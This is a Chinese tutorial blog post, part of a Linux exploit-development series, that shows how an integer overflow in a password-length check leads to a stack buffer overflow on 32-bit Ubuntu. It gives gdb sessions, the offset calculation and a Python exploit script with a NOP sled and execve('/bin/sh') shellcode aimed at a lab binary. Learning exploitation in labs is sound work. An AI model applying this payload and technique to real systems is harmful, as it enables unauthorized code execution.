整数溢出

虚拟机安装:Ubuntu 12.04(x86)

什么是整数溢出?

存储大于最大支持值的值称为整数溢出。整数溢出本身不会导致任意代码执行,但整数溢出可能会导致堆栈溢出或堆溢出,这可能导致任意代码执行。在这篇文章中,我将仅谈论整数溢出导致堆栈溢出,整数溢出导致堆溢出将在后面的单独的帖子中讨论。

后边的内容复制粘贴好烦,还是说关键点吧!

原文见:https://bbs.pediy.com/thread-216869.htm

这个文章解释的比上一个清楚多了,相信能看懂,唯一不懂的,和上一篇估计一样,还是地址计算的问题

同样是使用gdb 调试:gdb -q vuln

下边解释下我是如何找地址的(虚拟机环境Ubuntu14.04 32位系统,gcc 4.8.2)

首先使用disassemble 查看汇编代码,看看程序的汇编代码布局:

 (gdb) disassemble validate_passwd

 Dump of assembler code for function validate_passwd:

    0x08048507 <+>:    push   %ebp

    0x08048508 <+>:    mov    %esp,%ebp

    0x0804850a <+>:    sub    $0x28,%esp

    0x0804850d <+>:    mov    0x8(%ebp),%eax

    0x08048510 <+>:    mov    %eax,(%esp)

    0x08048513 <+>:    call   0x80483e0 <strlen@plt>

    0x08048518 <+>:    mov    %al,-0x9(%ebp)

    0x0804851b <+>:    cmpb   $0x3,-0x9(%ebp)

    0x0804851f <+>:    jbe    0x8048554 <validate_passwd+>

    0x08048521 <+>:    cmpb   $0x8,-0x9(%ebp)

    0x08048525 <+>:    ja     0x8048554 <validate_passwd+>

    0x08048527 <+>:    movl   $0x8048670,(%esp)

    0x0804852e <+>:    call   0x80483b0 <puts@plt>

    0x08048533 <+>:    mov    0x804a040,%eax

    0x08048538 <+>:    mov    %eax,(%esp)

    0x0804853b <+>:    call   0x8048390 <fflush@plt>

    0x08048540 <+>:    mov    0x8(%ebp),%eax

    0x08048543 <+>:    mov    %eax,0x4(%esp)

    0x08048547 <+>:    lea    -0x14(%ebp),%eax

    0x0804854a <+>:    mov    %eax,(%esp)

    0x0804854d <+>:    call   0x80483a0 <strcpy@plt>

嗯,发现编译器改动不大,就是将strlen函数直接内嵌了,没有使用函数调用(库函数的惯用做法),不多解释

(gdb) list 看一眼源码,方便下断点

(gdb) b validate_passwd 下断

然后开心的按照作者说的运行

下边是调试步骤

 Reading symbols from vuln...done.

 (gdb) b validate_passwd

 Breakpoint  at 0x804850d: file vuln.c, line .

 (gdb) r sploitfun `python -c 'print "A"*261'`

 Starting program: /home/jourluohua/work/test2/vuln sploitfun `python -c 'print "A"*261'`

 Breakpoint , validate_passwd (

     passwd=0xbffff6b6 'A' <repeats  times>...) at vuln.c:

      unsigned char passwd_len = strlen(passwd); /* [1] */

 (gdb) n        //单步调试,想看看执行到了我们认为的关键的代码没有,很明显这儿还不是关键代码

      if(passwd_len >=  && passwd_len <= ) { /* [2] */

 (gdb) n

       printf("Valid Password\n"); /* [3] */

 (gdb) p passwd_len  //这儿是关键处了,但是如果是正确的话,passwd_len 应该是'A',很可能是程序还没真正执行到

 $ =  '\005'

 (gdb) n

 Valid Password

       fflush(stdout);

 (gdb) n

       strcpy(passwd_buf,passwd); /* [4] */

 (gdb) n

      store_passwd_indb(passwd_buf); /* [6] */

 (gdb) p passwd_len    //好终于到了我们想要的地方了

 $ =  'A'

 (gdb) p &passwd_len   //passwd_len的地址,既然利用的是栈,我们在乎的是内存布局

 $ = (unsigned char *) 0xbffff46f 'A' <repeats  times>...

 (gdb) p buf        //手误,没有任何原因

 $ = 0x0

 (gdb) n

     }

 (gdb) p passwd_buf    //passwd_buf的值也对了

 $ = 'A' <repeats  times>

 (gdb) p &passwd_buf[]  //passwd_buf的地址也和我们想象的一样

 $ = 0xbffff464 'A' <repeats  times>...

 (gdb) p/x $eip      //很明显还没有被覆盖

 $ = 0x8048578

 (gdb) p/x $ebp      //这个真的不是在凑字数,ebp的地址很重要

 $ = 0xbffff478

 (gdb) n

 0x41414141 in ?? ()

 (gdb) p/x $eip      //好,已经覆盖了

 $ = 0x41414141

 (gdb) p/x $ebp

 $ = 0x41414141

 (gdb)

按照我上边的注释,相信大家对调试过程已经有了一定了解,现在说下地址的计算

$ebp - &passwd_buf[0] +4   = 0x18 = $eip - &passwd_buf[0]

这就是所谓的内存偏移,有了这个,我们的ret_addr就可以算出来了

ret_addr= 0xbffff464 +0x18 + 100

还是老规矩,附上我的exp.python 代码

 #exp.py

 #!/usr/bin/env python

 import struct

 from subprocess import call

 arg1 = "sploitfun"

 #Stack address where shellcode is copied.

 ret_addr = 0xbffff4e0

 #Spawn a shell

 #execve(/bin/sh)

 scode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\$

 #endianess convertion

 def conv(num):

  return struct.pack("<I",num)#unk + RA + NOP's + Shellcode

 arg2 = "A" * 24

 arg2 += conv(ret_addr);

 arg2 += "\x90" * 100

 arg2 += scode

 arg2 += "C" * 108

 print "Calling vulnerable program"

 call(["./vuln", arg1, arg2])

Linux Exploit系列之二 整数溢出的更多相关文章

  1. 深入理解 Linux Cgroup 系列(二):玩转 CPU

    原文链接:深入理解 Linux Cgroup 系列(二):玩转 CPU 上篇文章主要介绍了 cgroup 的一些基本概念,包括其在 CentOS 系统中的默认设置和控制工具,并以 CPU 为例阐述 c ...

  2. CVE-2019-11477:Linux 内核中TCP协议栈整数溢出漏洞详细分析 代码卫士 今天

    CVE-2019-11477:Linux 内核中TCP协议栈整数溢出漏洞详细分析 代码卫士 今天

  3. Linux (x86) Exploit 开发系列教程之二(整数溢出)

    (1)漏洞代码 //vuln.c #include <stdio.h> #include <string.h> #include <stdlib.h> void s ...

  4. Linux Exploit系列之一 典型的基于堆栈的缓冲区溢出

    Linux (x86) Exploit 开发系列教程之一(典型的基于堆栈的缓冲区溢出) Note:本文大部分来自于看雪hackyzh的中文翻译,加入了一些自己的理解 典型的基于堆栈的缓冲区溢出 虚拟机 ...

  5. Linux Exploit系列之七 绕过 ASLR -- 第二部分

    原文地址:https://github.com/wizardforcel/sploitfun-linux-x86-exp-tut-zh/blob/master/7.md 这一节是简单暴力的一节,作者讲 ...

  6. Linux Exploit系列之六 绕过ASLR - 第一部分

    绕过ASLR - 第一部分 什么是 ASLR? 地址空间布局随机化(ASLR)是随机化的利用缓解技术: 堆栈地址 堆地址 共享库地址 一旦上述地址被随机化,特别是当共享库地址被随机化时,我们采取的绕过 ...

  7. Linux Exploit系列之三 Off-By-One 漏洞 (基于栈)

    Off-By-One 漏洞 (基于栈) 原文地址:https://bbs.pediy.com/thread-216954.htm 什么是off by one? 将源字符串复制到目标缓冲区可能会导致of ...

  8. Linux Exploit系列之四 使用return-to-libc绕过NX bit

    使用return-to-libc绕过NX bit 原文地址:https://bbs.pediy.com/thread-216956.htm 这篇讲解的比较好,主要的问题是获得system地址和exit ...

  9. Linux Shell系列教程之(十二)Shell until循环

    本文是Linux Shell系列教程的第(十二)篇,更多Linux Shell教程请看:Linux Shell系列教程 在上两篇文章Linux Shell系列教程之(十)Shell for循环和Lin ...

随机推荐

  1. GLSL语法入门

    变量 GLSL的变量命名方式与C语言类似.变量的名称可以使用字母,数字以及下划线,但变量名不能以数字开头,还有变量名不能以gl_作为前缀,这个是GLSL保留的前缀,用于GLSL的内部变量.当然还有一些 ...

  2. 《视觉SLAM十四讲》第2讲

    目录 一 视觉SLAM中的传感器 二 经典视觉SLAM框架 三 SLAM问题的数学表述 注:原创不易,转载请务必注明原作者和出处,感谢支持! 本讲主要内容: (1) 视觉SLAM中的传感器 (2) 经 ...

  3. C++学习 之 初识命名空间

    声明:            本人自学C++, 没有计算机基础,在学习的过程难免会出现理解错误,出现风马牛不相及的现象,甚至有可能会贻笑大方. 如果有幸C++大牛能够扫到本人的博客,诚心希望大牛能给予 ...

  4. Ceph RBD 的实现原理与常规操作

    目录 文章目录 目录 前文列表 RBD RBD Pool 的创建与删除 块设备的创建与删除 块设备的挂载与卸载 新建客户端 块设备的扩缩容 RBD 块设备的 Format 1 VS Format 2 ...

  5. MonkeyRunner基本操作

    1. #导入模块; from com.android.monkeyrunner import MonkeyRunner, MonkeyDevice, MonkeyImage 2. #连接当前设备,并返 ...

  6. python django项目创建及前期准备(使用pycharm)

    一.创建django项目 1.打开pycharm软件 2.点击菜单栏 File-->New Project,弹出如下对话框,如下图设置 二.基本配置 1.静态文件目录配置(用于客户端访问后台服务 ...

  7. caoz的梦呓:信息安全常识科普

    猫宁!!! 参考链接:https://mp.weixin.qq.com/s/cl4TfOodBGSjUuEU8e0rGA 对方公众号:caoz的梦呓 前天在新加坡IC咖啡做了一场关于信息安全的常识普及 ...

  8. 【AMAD】stackprint -- 为Python加入利于调试的traceback信息

    简介 动机 作用 用法 热度分析 源码分析 个人评分 简介 为Python加入利于调试的traceback信息.  动机 Python抛出异常时,会显示一些traceback信息.但是,一些时候这些 ...

  9. KVM虚拟化原理

    CPU虚拟化 KVM虚拟化是需要硬件支持的.我们可以用 egrep -o '(vmx|svm)' /proc/cpuinfo 来查看是否支持CPU虚拟化. 虚拟机中每一个vCPU对应qemu-kvm中 ...

  10. 【机器学习理论】概率论与数理统计--假设检验,卡方检验,t检验,F检验,方差分析

    显著性水平α与P值: 1.显著性水平是估计总体参数落在某一区间内,可能犯错误的概率,用α表示. 显著性是对差异的程度而言的,是在进行假设检验前确定的一个可允许作为判断界限的小概率标准. 2.P值是用来 ...